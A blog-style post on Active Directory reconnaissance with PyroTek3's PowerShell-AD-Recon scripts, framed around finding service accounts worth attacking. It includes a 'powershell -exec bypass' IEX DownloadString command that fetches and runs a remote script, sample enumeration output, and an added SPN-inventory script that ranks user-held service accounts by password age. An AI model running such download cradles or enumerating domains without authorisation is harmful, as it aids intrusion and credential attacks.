Interesting PowerShell-AD-Recon repository by PyroTek3 at:
https://github.com/PyroTek3/PowerShell-AD-Recon
The rest of the repo has other scripts that are also very useful.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Finds Exchange servers
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Gets a list of all service accounts. These are always good candidates for finding some default ones.
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest info
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-Searches the forest for a list of attributes (the SPN service types in the filter below). This will take a LONG time in large forests/domains.
Default list of attributes:
[String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP",
"ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV",
"Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),
Source: carnal0wnage
https://github.com/PyroTek3/PowerShell-AD-Recon
C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET
Domain : UNLUCKY.NET
ServerName : unlucklaptop.unlucky.net
Port :
Instance : SQLEXPRESS
ServiceAccountDN :
OperatingSystem : {Windows 8.1 Enterprise}
OSServicePack :
LastBootup : 1/10/2015 11:47:55 AM
OSVersion : {6.3 (9600)}
Description :
Domain : UNLUCKY.NET
ServerName : unluckserver.unlucky.net
Port : 1433
Instance :
ServiceAccountDN : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem :
OSServicePack :
LastBootup : 12/31/1600 4:00:00 PM
OSVersion :
Description :
SrvAcctUserID : svc-userid
SrvAcctDescription : ---SNIP---
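The scripts above work by querying servicePrincipalName values in AD and parsing each SPN into service, host, port and instance, which is why the MS SQL output lists a Port, an Instance and the ServiceAccountDN. The following is an added example, not code from the PowerShell-AD-Recon repo or from carnal0wnage, that does the same SPN inventory for a short list of service types with only [adsisearcher] (no RSAT module) and then reports which SPNs are bound to user accounts rather than computer accounts. The $ServiceTypes subset, the $SearchRoot parameter and the output column names are this example's own choices; it assumes it runs as a domain user on a domain-joined host.

```powershell
# Added example (not from the PowerShell-AD-Recon repo): inventory SPNs for a set of
# service types and flag the ones held by user accounts. Uses System.DirectoryServices
# only, so it runs without the ActiveDirectory module. Names below are placeholders.
param(
    # Service types to look for; a short subset of the repo's default filter list.
    [string[]] $ServiceTypes = @("MSSQLSvc", "http", "ldap"),
    # Empty = current domain; pass e.g. "LDAP://DC=example,DC=net" to aim elsewhere.
    [string] $SearchRoot = ""
)

# Build one LDAP OR-filter, e.g.
# (&(servicePrincipalName=*)(|(servicePrincipalName=MSSQLSvc/*)(servicePrincipalName=http/*)...))
$clauses    = $ServiceTypes | ForEach-Object { "(servicePrincipalName=$_/*)" }
$ldapFilter = "(&(servicePrincipalName=*)(|$($clauses -join '')))"

$searcher = New-Object System.DirectoryServices.DirectorySearcher
if ($SearchRoot) {
    $searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry($SearchRoot)
}
$searcher.Filter   = $ldapFilter
$searcher.PageSize = 1000   # paged results, so large domains are not cut off at 1000 objects
[void] $searcher.PropertiesToLoad.AddRange(@("samaccountname", "objectclass",
                                             "serviceprincipalname", "pwdlastset"))

$results = foreach ($r in $searcher.FindAll()) {
    $props = $r.Properties
    # Computer objects carry both "user" and "computer" in objectClass; real service
    # accounts carry "user" only.
    $isUser = ($props["objectclass"] -contains "user") -and
              -not ($props["objectclass"] -contains "computer")
    $pwdLastSet = if ($props["pwdlastset"].Count) {
        [DateTime]::FromFileTime($props["pwdlastset"][0])
    } else { $null }

    foreach ($spn in $props["serviceprincipalname"]) {
        # SPN format: service/host[:port-or-instance][/servicename]
        $service, $rest = $spn -split "/", 2
        if ($ServiceTypes -notcontains $service) { continue }   # other SPN types on the same object
        $hostPart = ($rest -split "/")[0]
        $hostName, $portOrInstance = $hostPart -split ":", 2
        [pscustomobject]@{
            Account         = $props["samaccountname"][0]
            IsUserAccount   = $isUser
            PasswordLastSet = $pwdLastSet
            Service         = $service
            Host            = $hostName
            PortOrInstance  = $portOrInstance
            SPN             = $spn
        }
    }
}

# Review list: SPNs bound to user accounts are the ones whose password hygiene (age,
# length, gMSA use) should be checked first; oldest passwords sort to the top.
$results | Where-Object IsUserAccount | Sort-Object PasswordLastSet | Format-Table -AutoSize
```

Run it as `.\Get-SpnInventory.ps1` (any file name works) from a domain-joined host; the full $results collection can be exported with Export-Csv if you want the computer-account SPNs as well. The filter deliberately anchors on `service/` so that, unlike a bare substring match, an "http" entry does not also pull in every SPN that merely contains those letters.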
good post, keep it up friend